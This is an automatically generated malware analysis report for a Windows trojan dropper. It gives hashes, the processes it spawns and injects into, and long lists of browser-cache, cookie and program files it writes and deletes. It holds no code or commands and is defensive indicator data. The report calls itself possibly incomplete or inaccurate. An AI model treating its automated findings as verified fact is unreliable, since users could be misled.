Trojan-Dropper.Win32.Vtimrun_4733c34a7c

by malwarelabrobot on June 2nd, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.haaz (Kaspersky), Dropped:Trojan.Generic.11313659 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.IEDummy.FD, TrojanDropperVtimrun.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 4733c34a7ccff4c1b5e3f161e777fcd5
SHA1: 2465d4c9649b20875ecf161e7d78432b0b86e750
SHA256: 0787960a4da1ec23ee8f4cc0340d83493a1a3971f6d7007e6815c789cb4511dd
SSDeep: 24576:62RGmay4PA5NLqDYXyvDB2NeJfGaJYk1UsRNhwcBc4:7GfQNuN7seJ 2Yk/twIr
Size: 1082826 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: r-installer
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan-Dropper creates the following process(es):

BaiduSd.exe:3596
shandian.exe:1588
shandian.exe:476
F30241_s_0523.exe:1072
BaiduSdTray.exe:2920
bddownloader.exe:3304
regsvr32.exe:3556
BaiduSdSvc.exe:2716
BaiduSdSvc.exe:2612
netsh.exe:3540
BDKVWsc.exe:2976
RegSvr32.exe:3024
RegSvr32.exe:3316
BDDownloader.exe:2896
BDDownloader.exe:2700

The Trojan-Dropper injects its code into the following process(es):

emaaif_70690.exe:2652
sdad.exe:1628
%original file name%.exe:464
iexplore.exe:1664
services.exe:764
svchost.exe:1088

File activity

The process shandian.exe:1588 makes changes in the file system.
The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF6409.tmp (0 bytes)

The process shandian.exe:476 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140527160745_754[1].jpg (1826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\hotdata[1].js (992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\subnav_v41[1].png (634 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (1879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\favicon[1].ico (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\icon4[1].gif (1 bytes)
%Program Files%\shandian\bin\twcache.ini (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\20130830161205_609[1].gif (2789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v53_2icos[1].gif (2 bytes)
%Program Files%\shandian\bin\ImgCache\123.sogou.com_favicon.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\20130820165531_481[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\v53_123n[2].js (2192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\20140508103513_537[1].gif (4179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\guide_tip[1].png (1012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\newioage[1].css (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526163043_207[1].jpg (186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\i8g7XZO1lz1162[1].jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\foot_slider[1].jpg (322 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX3.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\ufo2[2].js (11043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\citydata[1].js (2933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\ufo2[1].js (12131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\123.sogou[1].htm (19620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\skin_tips_n1[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\logo_1112293[1].gif (1266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\fbg_about[1].png (634 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\welcome_cn[1].htm (1469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\v53_123n[1].js (3215 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\get_123_v53[1].php (7789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cloudy[1].gif (1 bytes)
%Program Files%\shandian\bin\shandian.ini.tmp (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\start_button[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\_ads_2[1].js (3 bytes)
%Program Files%\shandian\bin\theworld.ac (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\get_tj[1].php (1020 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\v53_bicos[1].gif (826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\selogo_111207[1].png (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140528121909_796[1].jpg (186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v53_arrow_h[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\new-erweima2[1].png (5570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\20130531144119_126[1].png (3340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526170756_638[1].jpg (186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\skin2_0[1].gif (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\citydata[2].js (2772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\i-ico-2b[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\search_arrow[1].gif (447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\main[2].js (2328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\skin3[1].gif (1266 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (193 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\rec[1].do (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\selogo_111207[2].png (1858 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526163446_912[1].jpg (1264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\mE8bXnNioe2802[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\setting_icon[1].gif (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\setskinbg[1].gif (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\texture[1].gif (1148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\new-ico[1].png (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\skin_[1].css (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\guide_tip[1].png (2099 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\titlebg[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\main[1].js (3049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\DD_belatedPNG_0.0.8a-min[2].js (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\_ads_2[2].js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\img-news[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\guide_top[1].jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v33_sugg_ajaj_v40_3[2].js (1187 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (9640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v33_sugg_ajaj_v40_3[1].js (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\selogo_111207[1].png (2331 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\hotdata[1].js (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\DD_belatedPNG_0.0.8a-min[1].js (678 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526163242_997[1].jpg (186 bytes)

The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\guide_tip[1].png (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
%Program Files%\shandian\bin\shandian.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130212 (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\v53_123n[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cloudy[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021320130214 (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\_ads_2[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\citydata[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\ufo2[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021520130216\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021520130216 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\guide_tip[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\main[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\hotdata[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021320130214\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v33_sugg_ajaj_v40_3[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130212\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\DD_belatedPNG_0.0.8a-min[1].js (0 bytes)

The process emaaif_70690.exe:2652 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMReport.dll.bdl (37083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\g.exe.bdl (658579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDLogicUtils.dll (31856 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (1121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\System.dll (784 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (200 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\g.exe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMNet.dll.bdl (39524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMSkin.dll (36698 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb8.tmp (128685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\tmppm4bkx.dll (24832 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\dl.dll (65930 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\res\onlineWnd.zip (14184 bytes)

The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (0 bytes)

The process sdad.exe:1628 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b17[1].jpg (8043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Untitled-1[1].gif (4902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\stat[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\style[1].css (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\ico_new2[1].png (11140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa7[1].jpg (1254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa9[1].jpg (1798 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa1[1].jpg (6743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\tj[1].js (279 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\b14[1].jpg (5425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\xinwen[1].htm (881 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa1[1].jpg (7701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\nvxing_509_366[1].htm (2047 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b19[1].jpg (1055 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (22456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\core[1].php (798 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b18[2].jpg (2436 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa6[1].jpg (6809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\lieqi_509_366[1].htm (2049 bytes)
%Program Files%\shandian\bin\update\PopWinParam.xml (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\close[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cpc_ztyw[1].css (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b19[1].jpg (2237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\cpc_swf[1].asp (1286 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@70e[1].txt (514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\xinwen[2].htm (881 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Untitled-3[1].jpg (2926 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (166 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@70e[2].txt (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\b14[1].jpg (6863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa2[2].jpg (7789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa2[1].jpg (3173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b15[1].jpg (4419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\meinv[1].htm (882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\nvxing_509_366[1].htm (1591 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\normal_bg[1].png (9772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\core[1].php (798 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b17[1].jpg (8728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Close[1].gif (348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\jiankang_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa6[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\jquery-1.7.2.min[1].js (45051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\stat[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa4[1].jpg (14268 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\cpc_img[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\shehui_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@565882[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa10[1].jpg (1518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\b13[1].jpg (7942 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (607 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa7[1].jpg (3892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa10[1].jpg (1878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa8[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b15[1].jpg (7788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b16[1].jpg (8744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\meinv[1].htm (882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa4[1].jpg (9878 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[2].txt (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Untitled-2[1].gif (1416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b18[1].jpg (2118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cpc_swf[1].asp (1807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\cpc_img[1].htm (884 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\d[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\jiankang_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa5[1].jpg (14586 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa3[1].jpg (5531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa8[1].jpg (1878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\stylemini[1].css (4664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\0[1].gif (17661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\miniindex[1].htm (4605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\min[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\shehui_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa3[2].jpg (14482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\2012_swf[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa9[1].jpg (975 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@zhouliboguju[1].txt (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\b13[1].jpg (7144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\lieqi_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\jquery-1.7.2.min[1].js (7973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa5[1].jpg (15401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cpv1[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b16[1].jpg (8350 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1017 bytes)

The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@70e[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa6[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\style[1].css (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b18[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cpc_swf[1].asp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\cpc_img[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b19[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\jiankang_509_366[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\style[1].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa3[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\cpc_swf[1].asp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@70e[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b17[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\shehui_509_366[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa9[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa8[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\style[2].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\b13[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\b14[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
